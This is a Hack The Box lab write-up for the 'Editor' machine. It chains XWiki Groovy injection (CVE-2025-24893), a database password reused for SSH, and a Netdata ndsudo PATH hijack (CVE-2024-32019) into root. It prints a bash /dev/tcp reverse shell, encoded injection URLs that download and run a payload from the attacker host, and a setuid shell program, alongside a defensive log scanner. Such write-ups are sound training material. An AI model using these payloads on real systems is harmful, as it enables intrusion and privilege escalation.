Hack The Box / LINUX / 2025-12-06

Hack The Box — Editor (Linux)

XWiki exploitation via CVE-2025-24893 grants initial access, credential reuse gives SSH as oliver, then Netdata ndsudo abuse (CVE-2024-32019) leads to root.

Target

  • IP: 10.129.138.178

Port scan

sudo nmap -sC -sV 10.129.138.178 -p- -v
PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp    open     http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
704/tcp   filtered elcsd
3679/tcp  filtered newton-dock
8080/tcp  open     http        Jetty 10.0.20
|_http-open-proxy: Proxy might be redirecting requests
| http-cookie-flags:
|   /:
|     JSESSIONID:
|_      httponly flag not set
| http-webdav-scan:
|   WebDAV type: Unknown
|   Server Type: Jetty(10.0.20)
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|_http-server-header: Jetty(10.0.20)
| http-methods:
|   Supported Methods: OPTIONS GET HEAD PROPFIND LOCK UNLOCK
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.129.138.178:8080/xwiki/bin/view/Main/
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
9034/tcp  filtered unknown
13656/tcp filtered unknown
17497/tcp filtered unknown
21764/tcp filtered unknown
22384/tcp filtered unknown
24833/tcp filtered unknown
26502/tcp filtered unknown
28537/tcp filtered unknown
29735/tcp filtered unknown
31739/tcp filtered unknown
47921/tcp filtered unknown
51909/tcp filtered unknown
55377/tcp filtered unknown
58935/tcp filtered unknown
62668/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add editor.htb to /etc/hosts.

Go to http://editor.htb.

We can download two files: simplistcode_1.0.deb and simplistcode_1.0.exe.

ar x simplistcode_1.0.deb
tar xvf data.tar.xz

There is a binary simplistcode.

file simplistcode
usr/local/bin/simplistcode: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fc89f558d158bb1cc6e5e463d6fe7c536da15abb, stripped

Note: it is stripped.

On the site click Docs.

We are redirected to http://wiki.editor.htb/xwiki/.

Add wiki.editor.htb to /etc/hosts.

Go to http://wiki.editor.htb/xwiki.

We see it is XWiki Debian 15.10.8.

There is an injection vulnerability in the SolrSearch macro, CVE-2025-24893: the text parameter is rendered as wiki syntax, so script macros such as {{groovy}} can be injected into it.

Create a file rev:

bash -i >& /dev/tcp/10.10.15.37/4444 0>&1

Start listeners:

python3 -m http.server 7777
nc -vlnp 4444

Go to:

http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22curl%20http%3A%2F%2F10%2E10%2E15%2E37%3A7777%2Frev%20%2Do%20%2Fdev%2Fshm%2Frev%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

Which corresponds to this command:

curl http://10.10.15.37:7777/rev -o /dev/shm/rev

Then go to:

http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22bash%20%2Fdev%2Fshm%2Frev%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

Which corresponds to this command:

bash /dev/shm/rev

We obtain a reverse shell as user xwiki.
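From the defender's side, the two requests above show up in the web server log as GET requests to SolrSearch with an URL-encoded text parameter. The following is an added example, not part of the original writeup: it decodes that parameter from constructed nginx-style log lines, flags XWiki script macros in it and pulls out the Groovy-executed command. The two SolrSearch paths are the writeup's own requests; the other log fields are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# XWiki macros that execute script when injected into rendered content
SUSPICIOUS_MACROS = ("{{groovy}}", "{{velocity}}", "{{python}}", "{{async")
# Groovy idiom used by the payloads: "command".execute()
EXEC_RE = re.compile(r'"([^"]*)"\.execute\(\)')
# nginx combined log: client ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log; the two SolrSearch paths are the writeup's requests.
SAMPLE_LOG = """\
10.10.15.37 - - [06/Dec/2025:10:01:02 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120
10.10.15.37 - - [06/Dec/2025:10:02:15 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22curl%20http%3A%2F%2F10%2E10%2E15%2E37%3A7777%2Frev%20%2Do%20%2Fdev%2Fshm%2Frev%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d HTTP/1.1" 200 812
10.10.15.37 - - [06/Dec/2025:10:02:40 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22bash%20%2Fdev%2Fshm%2Frev%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d HTTP/1.1" 200 812
10.10.15.37 - - [06/Dec/2025:10:03:00 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=editor HTTP/1.1" 200 2044
"""


def inspect_request(path):
    """Return (macros, commands) if the text parameter carries macro injection, else None."""
    query = parse_qs(urlsplit(path).query)
    macros, commands = set(), []
    for value in query.get("text", []):
        decoded = unquote(value)  # parse_qs decoded once; tolerate double encoding
        hits = [m for m in SUSPICIOUS_MACROS if m in decoded]
        if hits:
            macros.update(hits)
            commands.extend(EXEC_RE.findall(decoded))
    return (sorted(macros), commands) if macros else None


def scan_log(text):
    """Parse nginx-style lines and return one alert per injected request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, method, path, status = m.groups()
        result = inspect_request(path)
        if result:
            alerts.append({"client": client, "method": method, "status": int(status),
                           "macros": result[0], "commands": result[1]})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```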

ls -la /home

We notice user oliver.

cat /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml

We notice:

    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&amp;connectionTimeZone=LOCAL&amp;allowPublicKeyRetrieval=true</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>

The database password is reused for oliver's account:

ssh oliver@editor.htb

Enter the password theEd1t0rTeam99.

We obtain a shell.

id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)

oliver is in group netdata.

find / -group netdata 2> /dev/null
/opt/netdata

Forward netdata port:

ssh oliver@editor.htb -NL 19999:localhost:19999

Go to http://localhost:19999/.

At top-right there is a notification. Click it.

We discover agent version 1.45.2.

There is a vulnerability: CVE-2024-32019.

PoC reference:

  • https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93

cd /opt/netdata
find . -name ndsudo 2> /dev/null
./usr/libexec/netdata/plugins.d/ndsudo
ls -la ./usr/libexec/netdata/plugins.d/ndsudo
-rwsr-x--- 1 root netdata 200576 Apr  1  2024 ./usr/libexec/netdata/plugins.d/ndsudo

The SUID bit is set: the binary is owned by root and executable by members of group netdata, which oliver belongs to.

Create file getroot.c (also attached as attachments/getroot.c) with content:

#include <stdlib.h>
#include <unistd.h>

/* ndsudo launches this binary as root, so the spawned shell runs as root. */
int main(void) {
    setuid(0);              /* make the real uid root too, so bash keeps the privileges */
    return system("bash");
}

Compile it:

gcc -o getroot getroot.c

Upload it to the target, for example to /dev/shm, and rename it to nvme: ndsudo looks up the helper programs it runs (nvme among them) by name through the caller's PATH, which is the flaw behind CVE-2024-32019.

Make it executable if needed:

chmod +x /dev/shm/nvme

Now run:

export PATH=/dev/shm:$PATH
./usr/libexec/netdata/plugins.d/ndsudo nvme-list

We obtain a shell as root.